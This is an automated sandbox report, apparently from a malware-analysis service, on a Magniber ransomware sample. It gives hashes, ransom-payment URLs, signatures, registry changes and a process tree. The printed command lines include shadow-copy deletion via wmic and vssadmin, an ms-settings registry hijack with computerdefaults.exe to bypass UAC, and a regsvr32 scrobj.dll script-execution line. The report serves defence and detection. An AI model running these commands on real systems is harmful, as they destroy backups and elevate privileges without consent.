Resubmissions
18-11-2021 20:38
211118-zezheaafa6 1018-11-2021 20:37
211118-zekdgsaeh7 318-11-2021 20:36
211118-zdkymaaeh3 10Analysis
-
max time kernel
132s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
18-11-2021 20:38
Static task
static1
Behavioral task
behavioral1
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Resource
win10-en-20211014
General
-
Target
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
-
Size
22KB
-
MD5
7906dc475a8ae55ffb5af7fd3ac8f10a
-
SHA1
e7304e2436dc0eddddba229f1ec7145055030151
-
SHA256
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
-
SHA512
c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://1a08fc10787ca270f8eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
http://1a08fc10787ca270f8eltalkfzj.jobsbig.cam/eltalkfzj
http://1a08fc10787ca270f8eltalkfzj.boxgas.icu/eltalkfzj
http://1a08fc10787ca270f8eltalkfzj.sixsees.club/eltalkfzj
http://1a08fc10787ca270f8eltalkfzj.nowuser.casa/eltalkfzj
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4224 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4216 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4208 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4196 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4320 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4416 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4452 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4840 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4856 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5016 2620 cmd.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5112 2620 cmd.exe 95 -
Modifies extensions of user files 11 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\SearchOpen.crw => C:\Users\Admin\Pictures\SearchOpen.crw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\CompressRestore.tiff => C:\Users\Admin\Pictures\CompressRestore.tiff.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\ShowTrace.png => C:\Users\Admin\Pictures\ShowTrace.png.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\UnlockUninstall.png => C:\Users\Admin\Pictures\UnlockUninstall.png.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\DisableMove.raw => C:\Users\Admin\Pictures\DisableMove.raw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\RemoveTest.raw => C:\Users\Admin\Pictures\RemoveTest.raw.eltalkfzj sihost.exe File renamed C:\Users\Admin\Pictures\ShowClose.raw => C:\Users\Admin\Pictures\ShowClose.raw.eltalkfzj sihost.exe File opened for modification C:\Users\Admin\Pictures\ApproveStart.tiff sihost.exe File renamed C:\Users\Admin\Pictures\ApproveStart.tiff => C:\Users\Admin\Pictures\ApproveStart.tiff.eltalkfzj sihost.exe File opened for modification C:\Users\Admin\Pictures\CompressRestore.tiff sihost.exe File renamed C:\Users\Admin\Pictures\ReceiveConvertFrom.png => C:\Users\Admin\Pictures\ReceiveConvertFrom.png.eltalkfzj sihost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 8 set thread context of 2364 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 20 PID 8 set thread context of 2372 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 19 PID 8 set thread context of 2460 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 18 PID 8 set thread context of 2568 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 24 PID 8 set thread context of 3472 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 38 PID 8 set thread context of 3656 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 37 -
Program crash 1 IoCs
pid pid_target Process procid_target 1356 3656 WerFault.exe 37 -
Modifies registry class 29 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command sihost.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command svchost.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command taskhostw.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1812 notepad.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe 1356 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2568 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeDebugPrivilege 1356 WerFault.exe Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeIncreaseQuotaPrivilege 416 WMIC.exe Token: SeSecurityPrivilege 416 WMIC.exe Token: SeTakeOwnershipPrivilege 416 WMIC.exe Token: SeLoadDriverPrivilege 416 WMIC.exe Token: SeSystemProfilePrivilege 416 WMIC.exe Token: SeSystemtimePrivilege 416 WMIC.exe Token: SeProfSingleProcessPrivilege 416 WMIC.exe Token: SeIncBasePriorityPrivilege 416 WMIC.exe Token: SeCreatePagefilePrivilege 416 WMIC.exe Token: SeBackupPrivilege 416 WMIC.exe Token: SeRestorePrivilege 416 WMIC.exe Token: SeShutdownPrivilege 416 WMIC.exe Token: SeDebugPrivilege 416 WMIC.exe Token: SeSystemEnvironmentPrivilege 416 WMIC.exe Token: SeRemoteShutdownPrivilege 416 WMIC.exe Token: SeUndockPrivilege 416 WMIC.exe Token: SeManageVolumePrivilege 416 WMIC.exe Token: 33 416 WMIC.exe Token: 34 416 WMIC.exe Token: 35 416 WMIC.exe Token: 36 416 WMIC.exe Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeShutdownPrivilege 2568 Explorer.EXE Token: SeCreatePagefilePrivilege 2568 Explorer.EXE Token: SeIncreaseQuotaPrivilege 664 WMIC.exe Token: SeSecurityPrivilege 664 WMIC.exe Token: SeTakeOwnershipPrivilege 664 WMIC.exe Token: SeLoadDriverPrivilege 664 WMIC.exe Token: SeSystemProfilePrivilege 664 WMIC.exe Token: SeSystemtimePrivilege 664 WMIC.exe Token: SeProfSingleProcessPrivilege 664 WMIC.exe Token: SeIncBasePriorityPrivilege 664 WMIC.exe Token: SeCreatePagefilePrivilege 664 WMIC.exe Token: SeBackupPrivilege 664 WMIC.exe Token: SeRestorePrivilege 664 WMIC.exe Token: SeShutdownPrivilege 664 WMIC.exe Token: SeDebugPrivilege 664 WMIC.exe Token: SeSystemEnvironmentPrivilege 664 WMIC.exe Token: SeRemoteShutdownPrivilege 664 WMIC.exe Token: SeUndockPrivilege 664 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 1812 2364 sihost.exe 71 PID 2364 wrote to memory of 1812 2364 sihost.exe 71 PID 2364 wrote to memory of 844 2364 sihost.exe 73 PID 2364 wrote to memory of 844 2364 sihost.exe 73 PID 2364 wrote to memory of 780 2364 sihost.exe 74 PID 2364 wrote to memory of 780 2364 sihost.exe 74 PID 2364 wrote to memory of 2560 2364 sihost.exe 76 PID 2364 wrote to memory of 2560 2364 sihost.exe 76 PID 2560 wrote to memory of 416 2560 cmd.exe 79 PID 2560 wrote to memory of 416 2560 cmd.exe 79 PID 2372 wrote to memory of 436 2372 svchost.exe 80 PID 2372 wrote to memory of 436 2372 svchost.exe 80 PID 2372 wrote to memory of 2840 2372 svchost.exe 81 PID 2372 wrote to memory of 2840 2372 svchost.exe 81 PID 780 wrote to memory of 664 780 cmd.exe 84 PID 780 wrote to memory of 664 780 cmd.exe 84 PID 2840 wrote to memory of 2748 2840 cmd.exe 85 PID 2840 wrote to memory of 2748 2840 cmd.exe 85 PID 2460 wrote to memory of 3168 2460 taskhostw.exe 87 PID 2460 wrote to memory of 3168 2460 taskhostw.exe 87 PID 2460 wrote to memory of 1412 2460 taskhostw.exe 86 PID 2460 wrote to memory of 1412 2460 taskhostw.exe 86 PID 436 wrote to memory of 2076 436 cmd.exe 90 PID 436 wrote to memory of 2076 436 cmd.exe 90 PID 2568 wrote to memory of 2152 2568 Explorer.EXE 91 PID 2568 wrote to memory of 2152 2568 Explorer.EXE 91 PID 2568 wrote to memory of 2776 2568 Explorer.EXE 93 PID 2568 wrote to memory of 2776 2568 Explorer.EXE 93 PID 1412 wrote to memory of 1652 1412 cmd.exe 96 PID 1412 wrote to memory of 1652 1412 cmd.exe 96 PID 3472 wrote to memory of 1640 3472 RuntimeBroker.exe 97 PID 3472 wrote to memory of 1640 3472 RuntimeBroker.exe 97 PID 3472 wrote to memory of 3576 3472 RuntimeBroker.exe 98 PID 3472 wrote to memory of 3576 3472 RuntimeBroker.exe 98 PID 2776 wrote to memory of 2068 2776 cmd.exe 102 PID 2776 wrote to memory of 2068 2776 cmd.exe 102 PID 3168 wrote to memory of 3136 3168 cmd.exe 101 PID 3168 wrote to memory of 3136 3168 cmd.exe 101 PID 8 wrote to memory of 3188 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 103 PID 8 wrote to memory of 3188 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 103 PID 8 wrote to memory of 3688 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 8 wrote to memory of 3688 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 104 PID 2152 wrote to memory of 3712 2152 cmd.exe 106 PID 2152 wrote to memory of 3712 2152 cmd.exe 106 PID 3576 wrote to memory of 332 3576 cmd.exe 108 PID 3576 wrote to memory of 332 3576 cmd.exe 108 PID 8 wrote to memory of 1316 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 109 PID 8 wrote to memory of 1316 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 109 PID 8 wrote to memory of 892 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 110 PID 8 wrote to memory of 892 8 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe 110 PID 1640 wrote to memory of 4000 1640 cmd.exe 113 PID 1640 wrote to memory of 4000 1640 cmd.exe 113 PID 3188 wrote to memory of 3692 3188 cmd.exe 114 PID 3188 wrote to memory of 3692 3188 cmd.exe 114 PID 3688 wrote to memory of 3644 3688 cmd.exe 115 PID 3688 wrote to memory of 3644 3688 cmd.exe 115 PID 892 wrote to memory of 3328 892 cmd.exe 116 PID 892 wrote to memory of 3328 892 cmd.exe 116 PID 1316 wrote to memory of 2268 1316 cmd.exe 117 PID 1316 wrote to memory of 2268 1316 cmd.exe 117 PID 4320 wrote to memory of 4460 4320 cmd.exe 135 PID 4320 wrote to memory of 4460 4320 cmd.exe 135 PID 4208 wrote to memory of 4480 4208 cmd.exe 133 PID 4208 wrote to memory of 4480 4208 cmd.exe 133
Processes
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2460 -
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:1652
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3136
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2372 -
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2076
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2748
-
-
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2364 -
\??\c:\windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1812
-
-
\??\c:\windows\system32\cmd.execmd /c "start http://1a08fc10787ca270f8eltalkfzj.jobsbig.cam/eltalkfzj^&1^&57337033^&101^&371^&2215063"2⤵PID:844
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:416
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:3692
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:3644
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:2268
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵PID:3328
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3712
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2068
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3656
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3656 -s 8282⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4000
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:332
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4224 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4564
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4216 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4580
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4480
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4196 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4528
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4460
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4416 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4676
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4452 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4780
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4492 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4704
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4724 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:5084
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4840 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1308
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4856 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:2148
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:4980 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4468
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5016 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:1532
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
PID:5112 -
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵PID:4684
-